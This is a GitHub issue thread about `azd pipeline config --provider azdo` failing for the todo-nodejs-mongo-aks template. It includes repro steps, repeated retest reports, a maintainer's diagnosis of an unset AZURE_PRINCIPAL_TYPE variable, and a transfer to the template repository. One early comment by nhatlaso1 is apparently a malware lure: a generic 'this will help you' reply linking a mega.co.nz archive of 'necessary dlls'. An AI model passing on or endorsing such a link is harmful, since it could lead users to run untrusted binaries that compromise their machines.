### ISSUE TITLE
Fail to run `azd pipeline config --provider azdo` for `todo-nodejs-mongo-aks`

### ISSUE THREAD

**Issue by Menghua1** [Azure/azure-dev#4348]
**Describe the issue:**
Running the `azd pipeline config --provider azdo` command fails with the following error message:
![image](https://github.com/user-attachments/assets/2af2845d-81bc-4541-b349-83a65697d687)

**Repro Steps:**
1. Login in with command: `azd auth login`.
2. Run command: `azd init -t todo-nodejs-mongo-aks -b staging`.
3. Run command: `azd pipeline config --provider azdo`.

**Environment:**
- Template: `todo-nodejs-mongo-aks`.
- OS: Windows, MacOS.
- Azd version: `azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7)`

**Expected behavior:**
`azd pipeline config --provider azdo` commands can be run successfully.

@jongio for notification.

**Comment by nhatlaso1** [comment]
I think this will help you.
https://mega.co.nz/#!B31G2LaZ!uBBOCp9hLC7bq9kP8NC6s4DanQJJZuoFRr5FI_jkeic
I put the necessary dlls in the archive

**Comment by Menghua1** [comment]
@jongio Yes, this issue can also be reproduced in **main**. We tested the following four scenarios and they can all be reproduced:

- **Template**: `todo-nodejs-mongo-aks`.
- **OS**: Windows, MacOS.
- **Test Scenario**: 
1. Templates under the `main` branch + azd version 1.11.0-beta.1-daily.4152592 (commit e2ff8ba7dcc5b3f7e883213a2315a8b275294def). 
2. Templates under the `main` branch + azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7). 
3. Templates under the `staging` branch + azd version 1.11.0-beta.1-daily.4152592 (commit e2ff8ba7dcc5b3f7e883213a2315a8b275294def). 
4. Templates under the `staging` branch + azd version 1.11.0-beta.1-pr.4140256 (commit b6402defbf4c4210855e14c114988010e0a51ed7).

**Comment by rajeshkamal5050** [comment]
@wbreza remember seeing similar issue on the ai starters due to User vs ServicePrincipal? cc @vhvb1989

**Comment by Menghua1** [comment]
@rajeshkamal5050 and @jongio In the latest round of azd manual testing, this issue still exists.

- Template: `todo-nodejs-mongo-aks`.
- Branch: `staging`.
- OS: Windows.
- Azd version: azd version 1.10.3-pr.4243081 (commit 2c05c152915bdfd82e20d3350f249b22accd3deb) and azd version 1.11.0-beta.1-daily.4244391 (commit 8fc9d80640aa6f45f1a7d7631087c4a5f54e9e63).

**Comment by vhvb1989** [comment]
Looks like AZURE_PRINCIPAL_TYPE is not set during `azd pipeline config` and it is empty during CI run, making the runner to take the value of the literal ${AZURE_PRINCIPAL_TYPE} instead of replacing it with a value from the env.

This is an issue in the template configuration. The azure.yaml should define the AZURE_PRINCIPAL_TYPE in the pipeline->variables as a required ENV VAR to set during `azd pipeline config`

**Comment by Menghua1** [comment]
@rajeshkamal5050 In the latest round of azd manual testing, this issue still exists.

- Template: `todo-nodejs-mongo-aks`.
- Branch: `staging`.
- OS: `DevContainer`.
- Azd version: azd version 1.11.0-beta.1-daily.4247716 (commit https://github.com/Azure/azure-dev/commit/f4695c408eab9ea3cdedd1c3cb39aa01ad90123e).

**Comment by Menghua1** [comment]
@rajeshkamal5050 In the latest round of azd manual testing, this issue still exists.

- Template: `todo-nodejs-mongo-aks`.
- Branch: staging.
- OS: DevContainer.
- Azd version: azd version 1.12.0-beta.1-daily.4359062 (commit https://github.com/Azure/azure-dev/commit/6cd82ae9ff02e156a0056e994215191469442ab3).

**Comment by Menghua1** [comment]
@rajeshkamal5050 In the latest round of azd manual testing, this issue still exists.

- Template: `todo-nodejs-mongo-aks`.
- Branch: staging.
- OS: DevContainer.
- Azd version: azd version 1.12.0-beta.1-daily.4442669 (commit 9b60cbc2a703200eb04d325988dc359886b2dfcb).

**Comment by Menghua1** [comment]
@rajeshkamal5050 In the latest round of azd manual testing, this issue still exists.

- Template: `todo-nodejs-mongo-aks`.
- Branch: staging.
- OS: DevContainer.
- Azd version: azd version 1.12.0-beta.1-daily.4489231 (commit a6eb17988fc047579a8edaaa86f302f5f0ab4bb8).

**Comment by puicchan** [comment]
Transferred. https://github.com/Azure-Samples/todo-nodejs-mongo-aks/issues/16
